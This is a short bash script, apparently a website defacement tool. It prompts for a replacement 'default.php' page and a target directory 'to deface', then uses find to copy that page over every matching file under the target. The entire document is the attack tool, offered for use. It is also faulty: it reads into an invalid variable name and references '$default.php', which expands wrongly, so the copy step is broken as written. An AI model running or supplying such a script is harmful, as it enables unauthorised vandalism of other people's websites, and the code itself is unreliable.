#!/bin/bash
echo '[+] your default.php path on the server'
read default.php 
echo
echo '[+] enter the path To deface '
read path
echo
echo '[+] Starting ........'
find $path -name "default.php.*" -exec cp $default.php {} \;
echo 
echo '[+] Done !'
